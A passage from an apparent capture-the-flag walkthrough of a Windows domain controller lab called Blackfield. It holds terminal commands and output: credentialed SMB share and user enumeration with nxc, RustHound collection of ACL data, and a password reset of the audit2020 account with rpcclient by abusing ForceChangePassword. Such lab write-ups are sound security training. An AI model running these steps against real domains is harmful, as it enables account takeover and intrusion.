SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.229.17 -u 'support' -p '#00^BlackKnight' --shares
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.129.229.17 445 DC01 [*] Enumerated shares
SMB 10.129.229.17 445 DC01 Share Permissions Remark
SMB 10.129.229.17 445 DC01 ----- ----------- ------
SMB 10.129.229.17 445 DC01 ADMIN$ Remote Admin
SMB 10.129.229.17 445 DC01 C$ Default share
SMB 10.129.229.17 445 DC01 forensic Forensic / Audit share.
SMB 10.129.229.17 445 DC01 IPC$ READ Remote IPC
SMB 10.129.229.17 445 DC01 NETLOGON READ Logon server share
SMB 10.129.229.17 445 DC01 profiles$ READ
SMB 10.129.229.17 445 DC01 SYSVOL READ Logon server share

![vmware_pqROSPFvSz](2026-06/vmware_pqROSPFvSz.png)

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.229.17 -u 'support' -p '#00^BlackKnight' --users
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.129.229.17 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.229.17 445 DC01 Administrator 2020-02-23 18:09:53 0 Built-in account for administering the computer/domain
SMB 10.129.229.17 445 DC01 Guest 2020-06-03 16:18:28 0 Built-in account for guest access to the computer/domain
SMB 10.129.229.17 445 DC01 krbtgt 2020-02-23 18:08:31 0 Key Distribution Center Service Account
SMB 10.129.229.17 445 DC01 audit2020 2020-09-21 22:35:06 0
SMB 10.129.229.17 445 DC01 support 2020-02-23 17:53:23 0
SMB 10.129.229.17 445 DC01 BLACKFIELD764430 2020-02-23 12:43:18 0
SMB 10.129.229.17 445 DC01 BLACKFIELD538365 2020-02-23 12:43:20 0
SMB 10.129.229.17 445 DC01 BLACKFIELD189208 2020-02-23 12:43:21 0
SMB 10.129.229.17 445 DC01 BLACKFIELD404458 2020-02-23 12:43:23 0
SMB 10.129.229.17 445 DC01 BLACKFIELD706381 2020-02-23 12:43:24 0
SMB 10.129.229.17 445 DC01 BLACKFIELD937395 2020-02-23 12:43:25 0
SMB 10.129.229.17 445 DC01 BLACKFIELD553715 2020-02-23 12:43:27 0
SMB 10.129.229.17 445 DC01 BLACKFIELD840481 2020-02-23 12:43:28 0
SMB 10.129.229.17 445 DC01 BLACKFIELD622501 2020-02-23 12:43:30 0
SMB 10.129.229.17 445 DC01 BLACKFIELD787464 2020-02-23 12:43:31 0
SMB 10.129.229.17 445 DC01 BLACKFIELD163183 2020-02-23 12:43:33 0
SMB 10.129.229.17 445 DC01 BLACKFIELD869335 2020-02-23 12:43:35 0
SMB 10.129.229.17 445 DC01 BLACKFIELD319016 2020-02-23 12:43:36 0
SMB 10.129.229.17 445 DC01 BLACKFIELD600999 2020-02-23 12:43:38 0
SMB 10.129.229.17 445 DC01 BLACKFIELD894905 2020-02-23 12:43:39 0
SMB 10.129.229.17 445 DC01 BLACKFIELD253541 2020-02-23 12:43:41 0
SMB 10.129.229.17 445 DC01 BLACKFIELD175204 2020-02-23 12:43:42 0
SMB 10.129.229.17 445 DC01 BLACKFIELD727512 2020-02-23 12:43:44 0
SMB 10.129.229.17 445 DC01 BLACKFIELD227380 2020-02-23 12:43:45 0
SMB 10.129.229.17 445 DC01 BLACKFIELD251003 2020-02-23 12:43:47 0
SMB 10.129.229.17 445 DC01 BLACKFIELD129328 2020-02-23 12:43:49 0
SMB 10.129.229.17 445 DC01 BLACKFIELD616527 2020-02-23 12:43:50 0
SMB 10.129.229.17 445 DC01 BLACKFIELD533551 2020-02-23 12:43:51 0
SMB 10.129.229.17 445 DC01 BLACKFIELD883784 2020-02-23 12:43:53 0
SMB 10.129.229.17 445 DC01 BLACKFIELD908329 2020-02-23 12:43:55 0
SMB 10.129.229.17 445 DC01 BLACKFIELD601590 2020-02-23 12:43:56 0
SMB 10.129.229.17 445 DC01 BLACKFIELD573498 2020-02-23 12:43:58 0
SMB 10.129.229.17 445 DC01 BLACKFIELD290325 2020-02-23 12:43:59 0
SMB 10.129.229.17 445 DC01 BLACKFIELD775986 2020-02-23 12:44:00 0
SMB 10.129.229.17 445 DC01 BLACKFIELD348433 2020-02-23 12:44:02 0
SMB 10.129.229.17 445 DC01 BLACKFIELD196444 2020-02-23 12:44:03 0
SMB 10.129.229.17 445 DC01 BLACKFIELD137694 2020-02-23 12:44:05 0
SMB 10.129.229.17 445 DC01 BLACKFIELD533886 2020-02-23 12:44:06 0
SMB 10.129.229.17 445 DC01 BLACKFIELD268320 2020-02-23 12:44:07 0
SMB 10.129.229.17 445 DC01 BLACKFIELD909590 2020-02-23 12:44:09 0
SMB 10.129.229.17 445 DC01 BLACKFIELD136813 2020-02-23 12:44:10 0
SMB 10.129.229.17 445 DC01 BLACKFIELD358090 2020-02-23 12:44:12 0
SMB 10.129.229.17 445 DC01 BLACKFIELD561870 2020-02-23 12:44:13 0
SMB 10.129.229.17 445 DC01 BLACKFIELD269538 2020-02-23 12:44:14 0
SMB 10.129.229.17 445 DC01 BLACKFIELD169035 2020-02-23 12:44:16 0
SMB 10.129.229.17 445 DC01 BLACKFIELD118321 2020-02-23 12:44:17 0
SMB 10.129.229.17 445 DC01 BLACKFIELD592556 2020-02-23 12:44:19 0
SMB 10.129.229.17 445 DC01 BLACKFIELD618519 2020-02-23 12:44:20 0
SMB 10.129.229.17 445 DC01 BLACKFIELD329802 2020-02-23 12:44:22 0
SMB 10.129.229.17 445 DC01 BLACKFIELD753480 2020-02-23 12:44:23 0
SMB 10.129.229.17 445 DC01 BLACKFIELD837541 2020-02-23 12:44:24 0
SMB 10.129.229.17 445 DC01 BLACKFIELD186980 2020-02-23 12:44:26 0
SMB 10.129.229.17 445 DC01 BLACKFIELD419600 2020-02-23 12:44:27 0
SMB 10.129.229.17 445 DC01 BLACKFIELD220786 2020-02-23 12:44:30 0
SMB 10.129.229.17 445 DC01 BLACKFIELD767820 2020-02-23 12:44:31 0
SMB 10.129.229.17 445 DC01 BLACKFIELD549571 2020-02-23 12:44:33 0
SMB 10.129.229.17 445 DC01 BLACKFIELD411740 2020-02-23 12:44:40 0
SMB 10.129.229.17 445 DC01 BLACKFIELD768095 2020-02-23 12:44:57 0
SMB 10.129.229.17 445 DC01 BLACKFIELD835725 2020-02-23 12:44:58 0
SMB 10.129.229.17 445 DC01 BLACKFIELD251977 2020-02-23 12:44:59 0
SMB 10.129.229.17 445 DC01 BLACKFIELD430864 2020-02-23 12:45:00 0
SMB 10.129.229.17 445 DC01 BLACKFIELD413242 2020-02-23 12:45:01 0
SMB 10.129.229.17 445 DC01 BLACKFIELD464763 2020-02-23 12:45:02 0
SMB 10.129.229.17 445 DC01 BLACKFIELD266096 2020-02-23 12:45:03 0
SMB 10.129.229.17 445 DC01 BLACKFIELD334058 2020-02-23 12:45:04 0
SMB 10.129.229.17 445 DC01 BLACKFIELD404213 2020-02-23 12:45:06 0
SMB 10.129.229.17 445 DC01 BLACKFIELD219324 2020-02-23 12:45:07 0
SMB 10.129.229.17 445 DC01 BLACKFIELD412798 2020-02-23 12:45:08 0
SMB 10.129.229.17 445 DC01 BLACKFIELD441593 2020-02-23 12:45:09 0
SMB 10.129.229.17 445 DC01 BLACKFIELD606328 2020-02-23 12:45:10 0
SMB 10.129.229.17 445 DC01 BLACKFIELD796301 2020-02-23 12:45:11 0
SMB 10.129.229.17 445 DC01 BLACKFIELD415829 2020-02-23 12:45:12 0
SMB 10.129.229.17 445 DC01 BLACKFIELD820995 2020-02-23 12:45:13 0
SMB 10.129.229.17 445 DC01 BLACKFIELD695166 2020-02-23 12:45:14 0
SMB 10.129.229.17 445 DC01 BLACKFIELD759042 2020-02-23 12:45:15 0
SMB 10.129.229.17 445 DC01 BLACKFIELD607290 2020-02-23 12:45:16 0
SMB 10.129.229.17 445 DC01 BLACKFIELD229506 2020-02-23 12:45:17 0
SMB 10.129.229.17 445 DC01 BLACKFIELD256791 2020-02-23 12:45:18 0
SMB 10.129.229.17 445 DC01 BLACKFIELD997545 2020-02-23 12:45:19 0
SMB 10.129.229.17 445 DC01 BLACKFIELD114762 2020-02-23 12:45:20 0
SMB 10.129.229.17 445 DC01 BLACKFIELD321206 2020-02-23 12:45:21 0
SMB 10.129.229.17 445 DC01 BLACKFIELD195757 2020-02-23 12:45:22 0
SMB 10.129.229.17 445 DC01 BLACKFIELD877328 2020-02-23 12:45:23 0
SMB 10.129.229.17 445 DC01 BLACKFIELD446463 2020-02-23 12:45:24 0
SMB 10.129.229.17 445 DC01 BLACKFIELD579980 2020-02-23 12:45:25 0
SMB 10.129.229.17 445 DC01 BLACKFIELD775126 2020-02-23 12:45:26 0
SMB 10.129.229.17 445 DC01 BLACKFIELD429587 2020-02-23 12:45:27 0
SMB 10.129.229.17 445 DC01 BLACKFIELD534956 2020-02-23 12:45:28 0
SMB 10.129.229.17 445 DC01 BLACKFIELD315276 2020-02-23 12:45:29 0
SMB 10.129.229.17 445 DC01 BLACKFIELD995218 2020-02-23 12:45:30 0
SMB 10.129.229.17 445 DC01 BLACKFIELD843883 2020-02-23 12:45:31 0
SMB 10.129.229.17 445 DC01 BLACKFIELD876916 2020-02-23 12:45:32 0
SMB 10.129.229.17 445 DC01 BLACKFIELD382769 2020-02-23 12:45:33 0
SMB 10.129.229.17 445 DC01 BLACKFIELD194732 2020-02-23 12:45:34 0
SMB 10.129.229.17 445 DC01 BLACKFIELD191416 2020-02-23 12:45:35 0
SMB 10.129.229.17 445 DC01 BLACKFIELD932709 2020-02-23 12:45:36 0
SMB 10.129.229.17 445 DC01 BLACKFIELD546640 2020-02-23 12:45:37 0
SMB 10.129.229.17 445 DC01 BLACKFIELD569313 2020-02-23 12:45:38 0
SMB 10.129.229.17 445 DC01 BLACKFIELD744790 2020-02-23 12:45:39 0
SMB 10.129.229.17 445 DC01 BLACKFIELD739659 2020-02-23 12:45:40 0
SMB 10.129.229.17 445 DC01 BLACKFIELD926559 2020-02-23 12:45:41 0
SMB 10.129.229.17 445 DC01 BLACKFIELD969352 2020-02-23 12:45:42 0
SMB 10.129.229.17 445 DC01 BLACKFIELD253047 2020-02-23 12:45:43 0
SMB 10.129.229.17 445 DC01 BLACKFIELD899433 2020-02-23 12:45:44 0
SMB 10.129.229.17 445 DC01 BLACKFIELD606964 2020-02-23 12:45:45 0
SMB 10.129.229.17 445 DC01 BLACKFIELD385719 2020-02-23 12:45:46 0
SMB 10.129.229.17 445 DC01 BLACKFIELD838710 2020-02-23 12:45:47 0
SMB 10.129.229.17 445 DC01 BLACKFIELD608914 2020-02-23 12:45:48 0
SMB 10.129.229.17 445 DC01 BLACKFIELD569653 2020-02-23 12:45:50 0
SMB 10.129.229.17 445 DC01 BLACKFIELD759079 2020-02-23 12:45:51 0
SMB 10.129.229.17 445 DC01 BLACKFIELD488531 2020-02-23 12:45:51 0
SMB 10.129.229.17 445 DC01 BLACKFIELD160610 2020-02-23 12:45:52 0
SMB 10.129.229.17 445 DC01 BLACKFIELD586934 2020-02-23 12:45:53 0
SMB 10.129.229.17 445 DC01 BLACKFIELD819822 2020-02-23 12:45:55 0
SMB 10.129.229.17 445 DC01 BLACKFIELD739765 2020-02-23 12:45:55 0
SMB 10.129.229.17 445 DC01 BLACKFIELD875008 2020-02-23 12:45:56 0
SMB 10.129.229.17 445 DC01 BLACKFIELD441759 2020-02-23 12:45:57 0
SMB 10.129.229.17 445 DC01 BLACKFIELD763893 2020-02-23 12:45:59 0
SMB 10.129.229.17 445 DC01 BLACKFIELD713470 2020-02-23 12:46:00 0
SMB 10.129.229.17 445 DC01 BLACKFIELD131771 2020-02-23 12:46:01 0
SMB 10.129.229.17 445 DC01 BLACKFIELD793029 2020-02-23 12:46:02 0
SMB 10.129.229.17 445 DC01 BLACKFIELD694429 2020-02-23 12:46:03 0
SMB 10.129.229.17 445 DC01 BLACKFIELD802251 2020-02-23 12:46:04 0
SMB 10.129.229.17 445 DC01 BLACKFIELD602567 2020-02-23 12:46:05 0
SMB 10.129.229.17 445 DC01 BLACKFIELD328983 2020-02-23 12:46:06 0
SMB 10.129.229.17 445 DC01 BLACKFIELD990638 2020-02-23 12:46:07 0
SMB 10.129.229.17 445 DC01 BLACKFIELD350809 2020-02-23 12:46:08 0
SMB 10.129.229.17 445 DC01 BLACKFIELD405242 2020-02-23 12:46:09 0
SMB 10.129.229.17 445 DC01 BLACKFIELD267457 2020-02-23 12:46:10 0
SMB 10.129.229.17 445 DC01 BLACKFIELD686428 2020-02-23 12:46:11 0
SMB 10.129.229.17 445 DC01 BLACKFIELD478828 2020-02-23 12:46:12 0
SMB 10.129.229.17 445 DC01 BLACKFIELD129387 2020-02-23 12:46:13 0
SMB 10.129.229.17 445 DC01 BLACKFIELD544934 2020-02-23 12:46:14 0
SMB 10.129.229.17 445 DC01 BLACKFIELD115148 2020-02-23 12:46:15 0
SMB 10.129.229.17 445 DC01 BLACKFIELD753537 2020-02-23 12:46:16 0
SMB 10.129.229.17 445 DC01 BLACKFIELD416532 2020-02-23 12:46:17 0
SMB 10.129.229.17 445 DC01 BLACKFIELD680939 2020-02-23 12:46:18 0
SMB 10.129.229.17 445 DC01 BLACKFIELD732035 2020-02-23 12:46:19 0
SMB 10.129.229.17 445 DC01 BLACKFIELD522135 2020-02-23 12:46:21 0
SMB 10.129.229.17 445 DC01 BLACKFIELD773423 2020-02-23 12:46:22 0
SMB 10.129.229.17 445 DC01 BLACKFIELD371669 2020-02-23 12:46:24 0
SMB 10.129.229.17 445 DC01 BLACKFIELD252379 2020-02-23 12:46:25 0
SMB 10.129.229.17 445 DC01 BLACKFIELD828826 2020-02-23 12:46:26 0
SMB 10.129.229.17 445 DC01 BLACKFIELD548394 2020-02-23 12:46:27 0
SMB 10.129.229.17 445 DC01 BLACKFIELD611993 2020-02-23 12:46:28 0
SMB 10.129.229.17 445 DC01 BLACKFIELD192642 2020-02-23 12:46:29 0
SMB 10.129.229.17 445 DC01 BLACKFIELD106360 2020-02-23 12:46:30 0
SMB 10.129.229.17 445 DC01 BLACKFIELD939243 2020-02-23 12:46:32 0
SMB 10.129.229.17 445 DC01 BLACKFIELD230515 2020-02-23 12:46:33 0
SMB 10.129.229.17 445 DC01 BLACKFIELD774376 2020-02-23 12:46:34 0
SMB 10.129.229.17 445 DC01 BLACKFIELD576233 2020-02-23 12:46:35 0
SMB 10.129.229.17 445 DC01 BLACKFIELD676303 2020-02-23 12:46:36 0
SMB 10.129.229.17 445 DC01 BLACKFIELD673073 2020-02-23 12:46:37 0
SMB 10.129.229.17 445 DC01 BLACKFIELD558867 2020-02-23 12:46:38 0
SMB 10.129.229.17 445 DC01 BLACKFIELD184482 2020-02-23 12:46:39 0
SMB 10.129.229.17 445 DC01 BLACKFIELD724669 2020-02-23 12:46:40 0
SMB 10.129.229.17 445 DC01 BLACKFIELD765350 2020-02-23 12:46:41 0
SMB 10.129.229.17 445 DC01 BLACKFIELD411132 2020-02-23 12:46:43 0
SMB 10.129.229.17 445 DC01 BLACKFIELD128775 2020-02-23 12:46:44 0
SMB 10.129.229.17 445 DC01 BLACKFIELD704154 2020-02-23 12:46:45 0
SMB 10.129.229.17 445 DC01 BLACKFIELD107197 2020-02-23 12:46:46 0
SMB 10.129.229.17 445 DC01 BLACKFIELD994577 2020-02-23 12:46:47 0
SMB 10.129.229.17 445 DC01 BLACKFIELD683323 2020-02-23 12:46:48 0
SMB 10.129.229.17 445 DC01 BLACKFIELD433476 2020-02-23 12:46:49 0
SMB 10.129.229.17 445 DC01 BLACKFIELD644281 2020-02-23 12:46:50 0
SMB 10.129.229.17 445 DC01 BLACKFIELD195953 2020-02-23 12:46:51 0
SMB 10.129.229.17 445 DC01 BLACKFIELD868068 2020-02-23 12:46:52 0
SMB 10.129.229.17 445 DC01 BLACKFIELD690642 2020-02-23 12:46:53 0
SMB 10.129.229.17 445 DC01 BLACKFIELD465267 2020-02-23 12:46:54 0
SMB 10.129.229.17 445 DC01 BLACKFIELD199889 2020-02-23 12:46:55 0
SMB 10.129.229.17 445 DC01 BLACKFIELD468839 2020-02-23 12:46:56 0
SMB 10.129.229.17 445 DC01 BLACKFIELD348835 2020-02-23 12:46:57 0
SMB 10.129.229.17 445 DC01 BLACKFIELD624385 2020-02-23 12:46:58 0
SMB 10.129.229.17 445 DC01 BLACKFIELD818863 2020-02-23 12:46:59 0
SMB 10.129.229.17 445 DC01 BLACKFIELD939200 2020-02-23 12:47:00 0
SMB 10.129.229.17 445 DC01 BLACKFIELD135990 2020-02-23 12:47:01 0
SMB 10.129.229.17 445 DC01 BLACKFIELD484290 2020-02-23 12:47:02 0
SMB 10.129.229.17 445 DC01 BLACKFIELD898237 2020-02-23 12:47:03 0
SMB 10.129.229.17 445 DC01 BLACKFIELD773118 2020-02-23 12:47:04 0
SMB 10.129.229.17 445 DC01 BLACKFIELD148067 2020-02-23 12:47:05 0
SMB 10.129.229.17 445 DC01 BLACKFIELD390179 2020-02-23 12:47:06 0
SMB 10.129.229.17 445 DC01 BLACKFIELD359278 2020-02-23 12:47:08 0
SMB 10.129.229.17 445 DC01 BLACKFIELD375924 2020-02-23 12:47:09 0
SMB 10.129.229.17 445 DC01 BLACKFIELD533060 2020-02-23 12:47:10 0
SMB 10.129.229.17 445 DC01 BLACKFIELD534196 2020-02-23 12:47:11 0
SMB 10.129.229.17 445 DC01 BLACKFIELD639103 2020-02-23 12:47:12 0
SMB 10.129.229.17 445 DC01 BLACKFIELD933887 2020-02-23 12:47:13 0
SMB 10.129.229.17 445 DC01 BLACKFIELD907614 2020-02-23 12:47:15 0
SMB 10.129.229.17 445 DC01 BLACKFIELD991588 2020-02-23 12:47:15 0
SMB 10.129.229.17 445 DC01 BLACKFIELD781404 2020-02-23 12:47:17 0
SMB 10.129.229.17 445 DC01 BLACKFIELD787995 2020-02-23 12:47:18 0
SMB 10.129.229.17 445 DC01 BLACKFIELD911926 2020-02-23 12:47:19 0
SMB 10.129.229.17 445 DC01 BLACKFIELD146200 2020-02-23 12:47:20 0
SMB 10.129.229.17 445 DC01 BLACKFIELD826622 2020-02-23 12:47:21 0
SMB 10.129.229.17 445 DC01 BLACKFIELD171624 2020-02-23 12:47:22 0
SMB 10.129.229.17 445 DC01 BLACKFIELD497216 2020-02-23 12:47:23 0
SMB 10.129.229.17 445 DC01 BLACKFIELD839613 2020-02-23 12:47:24 0
SMB 10.129.229.17 445 DC01 BLACKFIELD428532 2020-02-23 12:47:26 0
SMB 10.129.229.17 445 DC01 BLACKFIELD697473 2020-02-23 12:47:27 0
SMB 10.129.229.17 445 DC01 BLACKFIELD291678 2020-02-23 12:47:28 0
SMB 10.129.229.17 445 DC01 BLACKFIELD623122 2020-02-23 12:47:29 0
SMB 10.129.229.17 445 DC01 BLACKFIELD765982 2020-02-23 12:47:30 0
SMB 10.129.229.17 445 DC01 BLACKFIELD701303 2020-02-23 12:47:31 0
SMB 10.129.229.17 445 DC01 BLACKFIELD250576 2020-02-23 12:47:32 0
SMB 10.129.229.17 445 DC01 BLACKFIELD971417 2020-02-23 12:47:33 0
SMB 10.129.229.17 445 DC01 BLACKFIELD160820 2020-02-23 12:47:34 0
SMB 10.129.229.17 445 DC01 BLACKFIELD385928 2020-02-23 12:47:35 0
SMB 10.129.229.17 445 DC01 BLACKFIELD848660 2020-02-23 12:47:36 0
SMB 10.129.229.17 445 DC01 BLACKFIELD682842 2020-02-23 12:47:37 0
SMB 10.129.229.17 445 DC01 BLACKFIELD813266 2020-02-23 12:47:38 0
SMB 10.129.229.17 445 DC01 BLACKFIELD274577 2020-02-23 12:47:39 0
SMB 10.129.229.17 445 DC01 BLACKFIELD448641 2020-02-23 12:47:40 0
SMB 10.129.229.17 445 DC01 BLACKFIELD318077 2020-02-23 12:47:41 0
SMB 10.129.229.17 445 DC01 BLACKFIELD289513 2020-02-23 12:47:42 0
SMB 10.129.229.17 445 DC01 BLACKFIELD336573 2020-02-23 12:47:43 0
SMB 10.129.229.17 445 DC01 BLACKFIELD962495 2020-02-23 12:47:44 0
SMB 10.129.229.17 445 DC01 BLACKFIELD566117 2020-02-23 12:47:45 0
SMB 10.129.229.17 445 DC01 BLACKFIELD617630 2020-02-23 12:47:47 0
SMB 10.129.229.17 445 DC01 BLACKFIELD717683 2020-02-23 12:47:48 0
SMB 10.129.229.17 445 DC01 BLACKFIELD390192 2020-02-23 12:47:49 0
SMB 10.129.229.17 445 DC01 BLACKFIELD652779 2020-02-23 12:47:50 0
SMB 10.129.229.17 445 DC01 BLACKFIELD665997 2020-02-23 12:47:51 0
SMB 10.129.229.17 445 DC01 BLACKFIELD998321 2020-02-23 12:47:52 0
SMB 10.129.229.17 445 DC01 BLACKFIELD946509 2020-02-23 12:47:53 0
SMB 10.129.229.17 445 DC01 BLACKFIELD228442 2020-02-23 12:47:54 0
SMB 10.129.229.17 445 DC01 BLACKFIELD548464 2020-02-23 12:47:55 0
SMB 10.129.229.17 445 DC01 BLACKFIELD586592 2020-02-23 12:47:56 0
SMB 10.129.229.17 445 DC01 BLACKFIELD512331 2020-02-23 12:47:57 0
SMB 10.129.229.17 445 DC01 BLACKFIELD609423 2020-02-23 12:47:58 0
SMB 10.129.229.17 445 DC01 BLACKFIELD395725 2020-02-23 12:47:59 0
SMB 10.129.229.17 445 DC01 BLACKFIELD438923 2020-02-23 12:48:00 0
SMB 10.129.229.17 445 DC01 BLACKFIELD691480 2020-02-23 12:48:02 0
SMB 10.129.229.17 445 DC01 BLACKFIELD236467 2020-02-23 12:48:03 0
SMB 10.129.229.17 445 DC01 BLACKFIELD895235 2020-02-23 12:48:04 0
SMB 10.129.229.17 445 DC01 BLACKFIELD788523 2020-02-23 12:48:05 0
SMB 10.129.229.17 445 DC01 BLACKFIELD710285 2020-02-23 12:48:07 0
SMB 10.129.229.17 445 DC01 BLACKFIELD357023 2020-02-23 12:48:08 0
SMB 10.129.229.17 445 DC01 BLACKFIELD362337 2020-02-23 12:48:09 0
SMB 10.129.229.17 445 DC01 BLACKFIELD651599 2020-02-23 12:48:10 0
SMB 10.129.229.17 445 DC01 BLACKFIELD579344 2020-02-23 12:48:11 0
SMB 10.129.229.17 445 DC01 BLACKFIELD859776 2020-02-23 12:48:12 0
SMB 10.129.229.17 445 DC01 BLACKFIELD789969 2020-02-23 12:48:13 0
SMB 10.129.229.17 445 DC01 BLACKFIELD356727 2020-02-23 12:48:14 0
SMB 10.129.229.17 445 DC01 BLACKFIELD962999 2020-02-23 12:48:15 0
SMB 10.129.229.17 445 DC01 BLACKFIELD201655 2020-02-23 12:48:16 0
SMB 10.129.229.17 445 DC01 BLACKFIELD635996 2020-02-23 12:48:17 0
SMB 10.129.229.17 445 DC01 BLACKFIELD478410 2020-02-23 12:48:18 0
SMB 10.129.229.17 445 DC01 BLACKFIELD518316 2020-02-23 12:48:19 0
SMB 10.129.229.17 445 DC01 BLACKFIELD202900 2020-02-23 12:48:20 0
SMB 10.129.229.17 445 DC01 BLACKFIELD767498 2020-02-23 12:48:21 0
SMB 10.129.229.17 445 DC01 BLACKFIELD103974 2020-02-23 12:48:22 0
SMB 10.129.229.17 445 DC01 BLACKFIELD135403 2020-02-23 12:48:23 0
SMB 10.129.229.17 445 DC01 BLACKFIELD112766 2020-02-23 12:48:24 0
SMB 10.129.229.17 445 DC01 BLACKFIELD978938 2020-02-23 12:48:25 0
SMB 10.129.229.17 445 DC01 BLACKFIELD871753 2020-02-23 12:48:26 0
SMB 10.129.229.17 445 DC01 BLACKFIELD136203 2020-02-23 12:48:27 0
SMB 10.129.229.17 445 DC01 BLACKFIELD634593 2020-02-23 12:48:28 0
SMB 10.129.229.17 445 DC01 BLACKFIELD274367 2020-02-23 12:48:29 0
SMB 10.129.229.17 445 DC01 BLACKFIELD520852 2020-02-23 12:48:30 0
SMB 10.129.229.17 445 DC01 BLACKFIELD339143 2020-02-23 12:48:31 0
SMB 10.129.229.17 445 DC01 BLACKFIELD684814 2020-02-23 12:48:32 0
SMB 10.129.229.17 445 DC01 BLACKFIELD792484 2020-02-23 12:48:33 0
SMB 10.129.229.17 445 DC01 BLACKFIELD802875 2020-02-23 12:48:34 0
SMB 10.129.229.17 445 DC01 BLACKFIELD383108 2020-02-23 12:48:35 0
SMB 10.129.229.17 445 DC01 BLACKFIELD318250 2020-02-23 12:48:36 0
SMB 10.129.229.17 445 DC01 BLACKFIELD496547 2020-02-23 12:48:37 0
SMB 10.129.229.17 445 DC01 BLACKFIELD219914 2020-02-23 12:48:38 0
SMB 10.129.229.17 445 DC01 BLACKFIELD454313 2020-02-23 12:48:39 0
SMB 10.129.229.17 445 DC01 BLACKFIELD460131 2020-02-23 12:48:41 0
SMB 10.129.229.17 445 DC01 BLACKFIELD613771 2020-02-23 12:48:42 0
SMB 10.129.229.17 445 DC01 BLACKFIELD632329 2020-02-23 12:48:43 0
SMB 10.129.229.17 445 DC01 BLACKFIELD402639 2020-02-23 12:48:44 0
SMB 10.129.229.17 445 DC01 BLACKFIELD235930 2020-02-23 12:48:45 0
SMB 10.129.229.17 445 DC01 BLACKFIELD246388 2020-02-23 12:48:46 0
SMB 10.129.229.17 445 DC01 BLACKFIELD946435 2020-02-23 12:48:47 0
SMB 10.129.229.17 445 DC01 BLACKFIELD739227 2020-02-23 12:48:48 0
SMB 10.129.229.17 445 DC01 BLACKFIELD827906 2020-02-23 12:48:49 0
SMB 10.129.229.17 445 DC01 BLACKFIELD198927 2020-02-23 12:48:50 0
SMB 10.129.229.17 445 DC01 BLACKFIELD169876 2020-02-23 12:48:51 0
SMB 10.129.229.17 445 DC01 BLACKFIELD150357 2020-02-23 12:48:52 0
SMB 10.129.229.17 445 DC01 BLACKFIELD594619 2020-02-23 12:48:53 0
SMB 10.129.229.17 445 DC01 BLACKFIELD274109 2020-02-23 12:48:54 0
SMB 10.129.229.17 445 DC01 BLACKFIELD682949 2020-02-23 12:48:55 0
SMB 10.129.229.17 445 DC01 BLACKFIELD316850 2020-02-23 12:48:56 0
SMB 10.129.229.17 445 DC01 BLACKFIELD884808 2020-02-23 12:48:57 0
SMB 10.129.229.17 445 DC01 BLACKFIELD327610 2020-02-23 12:48:58 0
SMB 10.129.229.17 445 DC01 BLACKFIELD899238 2020-02-23 12:49:00 0
SMB 10.129.229.17 445 DC01 BLACKFIELD184493 2020-02-23 12:49:01 0
SMB 10.129.229.17 445 DC01 BLACKFIELD631162 2020-02-23 12:49:02 0
SMB 10.129.229.17 445 DC01 BLACKFIELD591846 2020-02-23 12:49:03 0
SMB 10.129.229.17 445 DC01 BLACKFIELD896715 2020-02-23 12:49:03 0
SMB 10.129.229.17 445 DC01 BLACKFIELD500073 2020-02-23 12:49:05 0
SMB 10.129.229.17 445 DC01 BLACKFIELD584113 2020-02-23 12:49:06 0
SMB 10.129.229.17 445 DC01 BLACKFIELD204805 2020-02-23 12:49:07 0
SMB 10.129.229.17 445 DC01 BLACKFIELD842593 2020-02-23 12:49:08 0
SMB 10.129.229.17 445 DC01 BLACKFIELD397679 2020-02-23 12:49:09 0
SMB 10.129.229.17 445 DC01 BLACKFIELD842438 2020-02-23 12:49:10 0
SMB 10.129.229.17 445 DC01 BLACKFIELD286615 2020-02-23 12:49:11 0
SMB 10.129.229.17 445 DC01 BLACKFIELD224839 2020-02-23 12:49:12 0
SMB 10.129.229.17 445 DC01 BLACKFIELD631599 2020-02-23 12:49:13 0
SMB 10.129.229.17 445 DC01 BLACKFIELD247450 2020-02-23 12:49:14 0
SMB 10.129.229.17 445 DC01 BLACKFIELD290582 2020-02-23 12:49:15 0
SMB 10.129.229.17 445 DC01 BLACKFIELD657263 2020-02-23 12:49:16 0
SMB 10.129.229.17 445 DC01 BLACKFIELD314351 2020-02-23 12:49:17 0
SMB 10.129.229.17 445 DC01 BLACKFIELD434395 2020-02-23 12:49:18 0
SMB 10.129.229.17 445 DC01 BLACKFIELD410243 2020-02-23 12:49:19 0
SMB 10.129.229.17 445 DC01 BLACKFIELD307633 2020-02-23 12:49:20 0
SMB 10.129.229.17 445 DC01 BLACKFIELD758945 2020-02-23 12:49:21 0
SMB 10.129.229.17 445 DC01 BLACKFIELD541148 2020-02-23 12:49:22 0
SMB 10.129.229.17 445 DC01 BLACKFIELD532412 2020-02-23 12:49:23 0
SMB 10.129.229.17 445 DC01 BLACKFIELD996878 2020-02-23 12:49:24 0
SMB 10.129.229.17 445 DC01 BLACKFIELD653097 2020-02-23 12:49:25 0
SMB 10.129.229.17 445 DC01 BLACKFIELD438814 2020-02-23 12:49:26 0
SMB 10.129.229.17 445 DC01 svc_backup 2020-02-23 17:54:48 0
SMB 10.129.229.17 445 DC01 lydericlefebvre 2020-02-28 22:33:35 0 @lydericlefebvre - VM Creator
SMB 10.129.229.17 445 DC01 [*] Enumerated 315 local users: BLACKFIELD

Use RustHound to collect the domain's ACL data for BloodHound:

./rusthound -d BLACKFIELD.local -u support -p '#00^BlackKnight' -i 10.129.229.17 -z

As support we hold ForceChangePassword over audit2020, so we can reset that account's password without knowing the current one.

Reset the password with rpcclient (setuserinfo2 with info level 23):

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# rpcclient -U "BLACKFIELD.local\support%#00^BlackKnight" 10.129.229.17
rpcclient $>
rpcclient $> setuserinfo2 audit2020 23 'KaaDa@2026!'
rpcclient $>

